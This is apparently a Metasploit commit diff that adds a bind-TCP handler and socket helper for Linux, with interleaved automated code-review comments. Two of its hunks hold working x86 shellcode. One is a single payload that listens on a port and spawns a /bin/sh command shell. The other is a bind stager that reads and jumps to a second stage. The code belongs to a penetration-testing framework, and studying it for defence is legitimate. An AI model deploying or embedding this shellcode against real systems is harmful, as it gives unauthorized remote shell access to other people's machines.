bind tcp stager/inline for linux
git-svn-id: file:///home/svn/incoming/trunk@2776 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
46c2cd2ac1
commit
cc32a21386
@ -117,7 +117,7 @@ module Handler
# The amount of time to wait for a session to come in.
# The amount of time to wait for a session to come in.
#
#
def wfs_delay
def wfs_delay
1
2
end
end
#
#
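Review bot: The change of `wfs_delay` from 1 to 2 carries no explanation, and the header above it still does not say what unit the value is in; I cannot confirm the unit from this hunk, so that should come from the caller. Once confirmed, I'd make the comment say it explicitly, e.g. `# The amount of time (in seconds) to wait for a session to come in.`, and record why the default was doubled either there or in the commit message. The enclosing module `Handler` starts and ends outside the hunk.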
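--- /dev/null
+++ b/PATH-NOT-ON-PAGE-1
@@ -0,0 +1,112 @@
+module Msf
+module Handler
+
+###
+#
+# BindTcp
+# -------
+#
+# This module implements the Bind TCP handler. This means that
+# it will attempt to connect to a remote host on a given port for a period of
+# time (typically the duration of an exploit) to see if a the payload has
+# started listening. This can tend to be rather verbose in terms of traffic
+# and in general it is preferable to use reverse payloads.
+#
+###
+module BindTcp
+
+include Msf::Handler
+
+def self.handler_type
+return "bind_tcp"
+end
+
+def initialize(info = {})
+super
+
+register_options(
+[
+Opt::RHOST,
+Opt::LPORT(4444)
+], Msf::Handler::BindTcp)
+
+self.conn_threads = []
+end
+
+#
+# No setup to speak of
+#
+def setup_handler
+end
+
+#
+# Kills off the connection threads if there are any hanging around.
+#
+def cleanup_handler
+# Kill any remaining handle_connection threads that might
+# be hanging around
+conn_threads.each { |thr|
+thr.kill
+}
+end
+
+#
+# Starts monitoring for an outbound connection to become established.
+#
+def start_handler
+listener_thread = Thread.new {
+client = nil
+
+print_status("Started bind handler")
+
+# Keep trying to connect
+callcc { |ctx|
+while true
+begin
+client = Rex::Socket::Tcp.create(
+'PeerHost' => datastore['RHOST'],
+'PeerPort' => datastore['LPORT'].to_i,
+'Comm' => comm)
+rescue Rex::ConnectionRefused
+# Connection refused is a-okay
+rescue
+wlog("Exception caught in bind handler: #{$!}")
+end
+
+ctx.call if (client)
+
+# Wait a second before trying again
+Rex::ThreadSafe.sleep(0.5)
+end
+}
+
+# Valid client connection?
+if (client)
+# Start a new thread and pass the client connection
+# as the input and output pipe. Client's are expected
+# to implement the Stream interface.
+conn_threads << Thread.new {
+begin
+handle_connection(client)
+rescue
+elog("Exception raised from BindTcp.handle_connection: #{$!}")
+end
+}
+end
+}
+end
+
+#
+# Nothing to speak of.
+#
+def stop_handler
+end
+
+protected
+
+attr_accessor :conn_threads
+
+end
+
+end
+end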
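Review bot: `start_handler` keeps the polling thread only in the local `listener_thread`, which is dropped on return, so nothing can ever stop the `while true` connect loop: `stop_handler` is empty and `cleanup_handler` kills only `conn_threads`, leaving a handler that keeps dialing `datastore['RHOST']` every 0.5s after the exploit has moved on. I'd keep the thread on the object — `self.listener_thread = Thread.new {` in `start_handler`, `listener_thread.kill if listener_thread` in `stop_handler`, and `attr_accessor :conn_threads, :listener_thread` under `protected`. The `callcc` escape is also just a `break` out of the loop once `client` is set, which reads more plainly and drops the continuation dependency. Finally the comment `# Wait a second before trying again` disagrees with the `Rex::ThreadSafe.sleep(0.5)` beneath it; one of them should change.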
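--- a/PATH-NOT-ON-PAGE-2
+++ b/PATH-NOT-ON-PAGE-2
@@ -23,6 +23,13 @@ class Rex::Socket::Tcp < Rex::Socket
 #
 ##
 
+#
+# Creates the client using the supplied hash
+#
+def self.create(hash)
+self.create_param(Rex::Socket::Parameters.from_hash(hash))
+end
+
 #
 # Wrapper around the base socket class' creation method that automatically
 # sets the parameter's protocol to TCP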
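Review bot: The header on the new `self.create(hash)` says only that it uses "the supplied hash", and nothing in the hunk says which keys are honored; the only caller in this commit passes `'PeerHost'`, `'PeerPort'` and `'Comm'`. I'd point the reader at the place that defines them, e.g. `# Creates the client from a hash of Rex::Socket::Parameters keys (see Parameters.from_hash for the accepted keys)`, worded as a pointer since the key set itself lives outside this hunk. The enclosing class `Rex::Socket::Tcp` starts and ends outside the hunk.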
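--- /dev/null
+++ b/PATH-NOT-ON-PAGE-3
@@ -0,0 +1,44 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Linux
+module X86
+
+module ShellBindTcp
+
+include Msf::Payload::Single
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Linux Command Shell, Bind TCP Inline',
+'Version' => '$Revision$',
+'Description' => 'Listen for a connection and spawn a command shell',
+'Author' => [ 'skape', 'vlad902' ],
+'Platform' => 'linux',
+'Arch' => ARCH_X86,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShell,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 0x14, 'n' ],
+},
+'Payload' =>
+"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
+"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
+"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
+"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +
+"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
+"\x89\xe1\xcd\x80"
+}
+))
+end
+
+end
+
+end end end end end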
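Review bot: The `'Offsets'` entry `'LPORT' => [ 0x14, 'n' ]` is the only link between the option and the opaque `'Payload'` string, and nothing says which bytes it patches; counting the literal, byte 0x14 is the `\xbf\xbf` pair on the second line, which is consistent, but anyone editing the blob has no way to see that without recounting. I'd add a comment above `'Offsets'`: `# LPORT is written in network byte order over the two 0xbf placeholder bytes at offset 0x14; keep in sync if the stub changes`. The same point applies to the `'Offsets'` table of the stager in the last hunk on this page, which uses the same placeholder at the same offset. `'Author'` is an array here but a bare string in that stager; if `merge_info` accepts both that is harmless, though a single form would be easier to grep.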
@ -8,7 +8,7 @@ module Singles
module Linux
module Linux
module X86
module X86
module Shell
module ShellReverseTcp
include Msf::Payload::Single
include Msf::Payload::Single
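--- /dev/null
+++ b/PATH-NOT-ON-PAGE-4
@@ -0,0 +1,48 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+module Msf
+module Payloads
+module Stagers
+module Linux
+module X86
+
+###
+#
+# BindTcp
+# -------
+#
+# Linux bind TCP stager.
+#
+###
+module BindTcp
+
+include Msf::Payload::Stager
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Bind TCP Stager',
+'Version' => '$Revision$',
+'Description' => 'Listen for a connection',
+'Author' => 'skape',
+'Platform' => 'linux',
+'Arch' => ARCH_X86,
+'Handler' => Msf::Handler::BindTcp,
+'Stager' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 0x14, 'n' ],
+},
+'Payload' =>
+"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
+"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
+"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
+"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
+}
+))
+end
+
+end
+
+end end end end end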